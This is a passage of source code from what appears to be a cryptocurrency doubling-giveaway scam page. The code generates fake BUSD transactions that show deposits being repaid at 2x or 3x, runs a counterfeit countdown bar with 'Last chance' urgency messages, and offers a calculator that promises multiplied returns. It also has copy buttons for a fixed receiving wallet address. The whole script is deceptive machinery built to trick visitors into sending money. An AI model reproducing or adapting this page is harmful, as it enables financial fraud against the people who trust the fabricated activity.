    '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
    tx(99999999) +
    '</a></td> <td><span class="timer" >now</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
    address +
    '</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>' +
    amount +
    ' BUSD</td> <td><span class="small text-secondary">0<b>.</b>000' +
    tx(999) +
    '</span></td> </tr>'),
    document
      .getElementById('myTable')
      .deleteRow(document.getElementById('myTable').rows.length - 1),
    document.getElementsByTagName('tr')[1].classList.add('toolbar'),
    setTimeout(() => {
      var table,
        row = document.getElementById('myTable').insertRow(1),
        send_amount = amount * parcent
      ;(row.innerHTML =
        '<tr> <td><a class="hash-tag text-truncate" href="index.html">' +
        generateId(63) +
        '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
        tx(99999999) +
        '</a></td> <td><span class="timer" >now</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
        address +
        '</a> </td> <td>' +
        send_amount +
        ' BUSD</td> <td><span class="small text-secondary">0<b>.</b>000' +
        tx(999) +
        '</span></td> </tr>'),
        document
          .getElementById('myTable')
          .deleteRow(document.getElementById('myTable').rows.length - 1),
        document.getElementsByTagName('tr')[1].classList.add('toolbar')
    }, 8500)
}

function update_trans() {
  for (i = 0; i < times.length; i++)
    'now' == times[i].innerHTML
      ? (times[i].innerHTML = '1 mins ago')
      : 1 == parseInt(times[i].innerHTML.split(' ')[0]) &&
        'mins' == times[i].innerHTML.split(' ')[1]
      ? (times[i].innerHTML =
          parseInt(times[i].innerHTML.split(' ')[0]) + 1 + ' mins ago')
      : parseInt(times[i].innerHTML.split(' ')[0]) >= 59 &&
        'mins' == times[i].innerHTML.split(' ')[1]
      ? (times[i].innerHTML = '1 hrs ago')
      : parseInt(times[i].innerHTML.split(' ')[0]) > 1 &&
        'mins' == times[i].innerHTML.split(' ')[1] &&
        (times[i].innerHTML = parseInt(times[i].innerHTML.split()[0]) + 1 + ' mins ago')
  new_transaction();
}

;(get_random = function (
  list = [
    "0x" + generateId(40),
    'Binance 1',
    "0x" + generateId(40),
    'Binance 2',
    "0x" + generateId(40),
    'Binance 3',
    "0x" + generateId(40),
    'Remitano 2',
    "0x" + generateId(40),
    'Remitano 3',
    "0x" + generateId(40),
    'Remitano 1',
    "0x" + generateId(40),
    'Mercatox',
    "0x" + generateId(40),
    'IndaCoin',
    "0x" + generateId(40),
    'CoinExchange.io',
    "0x" + generateId(40),
    'HitBTC 2',
    "0x" + generateId(40),
    'HitBTC 1',
    "0x" + generateId(40),
    'LAToken 3',
    "0x" + generateId(40),
    'LAToken 2',
    "0x" + generateId(40),
    'LAToken 1',
  ],
) {
  return list[Math.floor(Math.random() * list.length)]
}),
  $(document).ready(() => {
    for (i = 25; i > 0; i--) create_transaction(i)
    update_tx(), update_count()
  }),
  (times = document.getElementsByClassName('timer')),
  (window.onload = () => {
    update_trans(),
      (trans = setInterval(() => {
        update_trans()
      }, 1e4))
  }),
  $('#gen-btn').click(() => {
    if ($('#cal-in').val() >= 375 && $('#cal-in').val() <= 9999999) {
      amount_entered = $('#cal-in').val()
      tm = Date.now()
	    $("#xrp-tag").text(tx(9999999))
      $('#gen-amount').text(amount_entered)
      $('#warn').text(''), $('.pop-body').css('display', 'flex')
    } else $('#warn').text('Amount should be start from 375 BUSD')
  }),
  $('#close').click(() => {
    $('.pop-body').css('display', 'none')
  }),
  setTimeout(function () {
    let viewheight = $(window).height(),
      viewwidth = $(window).width(),
      viewport
    document
      .querySelector('meta[name=viewport]')
      .setAttribute(
        'content',
        'height=' +
          viewheight +
          'px, width=' +
          viewwidth +
          'px, initial-scale=1.0',
      )
  }, 300),
  $('#cal-in').on('input', () => {
    var in_amount = $('#cal-in').val()
    if (in_amount >= 0 && in_amount < 10000) {
      amt = (in_amount * 2)
      out = $('#cal-out')
      out.val(amt)
      // if (amt%1){
      //   out.val(amt.toFixed(3))
      // }
      // else {
      //   out.val(amt.toFixed(0))
      // }
    } else if ((in_amount) >= 6000 && in_amount <= 1000000) {
      amt = (in_amount * 3)
      out = $('#cal-out')
      out.val(amt)
      // if (amt%1){
      //   out.val(amt.toFixed(0))
      // }
      // else{
      //   out.val(amt.toFixed(3))
      // }
    }
  })

$('#cal-out').on('input', () => {
  var in_amount = $('#cal-out').val()
  if (in_amount >= 2000 && in_amount < 6000) {
    amt = (in_amount / 2)
    out = $('#cal-in')
    out.value(amt)
    // if (amt%1){
    //   out.value(amt.toFixed(0))
    // }
    // else {
    //   out.value(amt.toFixed(3))
    // }
    $('#cal-in').val(in_amount / 2)
  } else if ((in_amount) >= 6000 && in_amount <= 1000000) {
    $('#cal-in').val(in_amount / 3)
  }
})

function copy_item(item) {
  var t = window.getSelection(),
    e = document.createElement('div')
  ;(e.style.position = 'absolute'),
    (e.style.left = '-99999px'),
    document.body.appendChild(e),
    (e.innerHTML = item),
    t.selectAllChildren(e),
    window.setTimeout(function () {
      document.body.removeChild(e)
    }, 100)
}

function copyToClipboard(text) {
    if (window.clipboardData && window.clipboardData.setData) {
        // Internet Explorer-specific code path to prevent textarea being shown while dialog is visible.
        return clipboardData.setData("Text", text);

    }
    else if (document.queryCommandSupported && document.queryCommandSupported("copy")) {
        var textarea = document.createElement("textarea");
        textarea.textContent = text;
        textarea.style.position = "fixed";  // Prevent scrolling to bottom of page in Microsoft Edge.
        document.body.appendChild(textarea);
        textarea.select();
        try {
            return document.execCommand("copy");  // Security exception may be thrown by some browsers.
        }
        catch (ex) {
            //console.warn("Copy to clipboard failed.", ex);
            return false;
        }
        finally {
            document.body.removeChild(textarea);
        }
    }
}

function copy_main(id, fade) {
  copy_item($('#' + id).attr('data-clipboard-text'))
  var clipboard = new Clipboard('#' + id)
  clipboard.on('success', function () {
    $('#' + fade).css('opacity', 1), $('#' + id).css('opacity', 0)
  }),
    clipboard.on('error', function (e) {
      $('.tooltiptetext').html('Faild!')
    })
}

// Copy amount starts here

$('#copy_').click(() => {
  copyToClipboard($("#gen-amount").text());
  $('#copy_').attr('src', "../static/files/done.svg");
})

$('#copy_').mouseleave(() => {
  $('#copy_').attr('src', "../static/files/copy.svg");
})

// Copy amount ends here

// Copy address part starts here

$('#copy_address').click(() => {
  copyToClipboard('0x60ED062961e81B0907ca094cEFc965A0433F8574');
  $('#copy_address').attr('src', '../static/files/done.svg');
})

$('#copy_address').mouseleave(() => {
  $('#copy_address').attr('src', "../static/files/copy.svg");
})

$('#copy_tag').click(() => {
  copyToClipboard($('#xrp-tag').text());
  $('#copy_tag').attr('src', '../static/files/done.svg');
})

$('#copy_tag').mouseleave(() => {
  $('#copy_tag').attr('src', "../static/files/copy.svg");
})

// Copy address part ends here

    </script>

    <script>
        function setProgress(count, max) {
            var p = (100 * count / max).toString() + '%';
            $('.progress-left').css('left', p);
            $('.progress-width').css('width', p);
            var aa = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            var rr = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            $('.pbv').text(aa + ' / ' + rr);

        }



        var ctd = setInterval(function () {
            if (localStorage.getItem("usdtprogress")) {
                if (localStorage.getItem("usdtprogress") <= 150) {
                    var alt_count = localStorage.getItem("usdtprogress");
                } else if (localStorage.getItem("usdtprogress")) {
                    var alt_sec_count = localStorage.getItem("usdtprogress");
                    var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
                }
            } else {
                var alt_sec_count = 50000000;
                var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * (1000000 * 2));
            }
            setProgress(alt_count, 200000000)



            localStorage.setItem("usdtprogress", alt_count);

            if (alt_sec_count <= 40000)
                clearInterval(ctd);
            if (alt_count <= 3000000 && alt_sec_count >= 3500000)
                document.getElementById("leftBUSD").innerHTML = "Left BUSD";
            if (alt_count <= 2000000 && alt_sec_count >= 2500000)
                document.getElementById("leftBUSD").innerHTML = "Hurry up, not much more BUSD left!";
            if (alt_count <= 1500000)
                document.getElementById("leftBUSD").innerHTML = "Last chance to get your BUSD!";
            if (alt_count <= 500000)
                document.title = alt_count + " BUSD left";
            if (alt_count <= 1000000)
                document.title = "Get your " + alt_count + " BUSD now!";

        }, 6666);
    </script>
    <!-- ###############################End of progress bar######################################### -->

    <script>

        function timer(t_ex, timer){
            expire = new Date(t_ex*1000).getTime();
            now = new Date().getTime(); 
            dis = expire - now
            days = Math.floor((dis%(1000*60*60*24*24))/(1000*60*60*24))
            hrs = Math.floor((dis%(1000*60*60*24))/(1000*60*60))
            mins = Math.floor((dis%(1000*60*60))/(1000*60))
            secs = Math.floor((dis%(1000*60))/(1000))
            m_secs = Math.floor((dis%(1000)))
            if (dis > 0) {
                timer.innerHTML = days+":"+hrs+":"+mins+":"+secs+":"+m_secs
            }
            else{
                window.location.reload()
            }
        }
        
        function set_timer(){
            let t_ex = null
            if (t_ex){
                expire = new Date(t_ex*1000).getTime();
                now = new Date().getTime(); 
                dis = expire - now
                if (dis > 0){
                    timer_html = document.getElementById('timer')
                    timer(t_ex, timer_html);
                    setInterval(()=>{
                        timer(t_ex, timer_html);
                    }, 1)
                }
                
            }
        }
        set_timer()
    </script>

  <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/61714e8d86aee40a5737ad83/1fih9ln5e';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->



<script async="" charset="UTF-8" src="./BUSD_files/en.js.download"></script></body></html>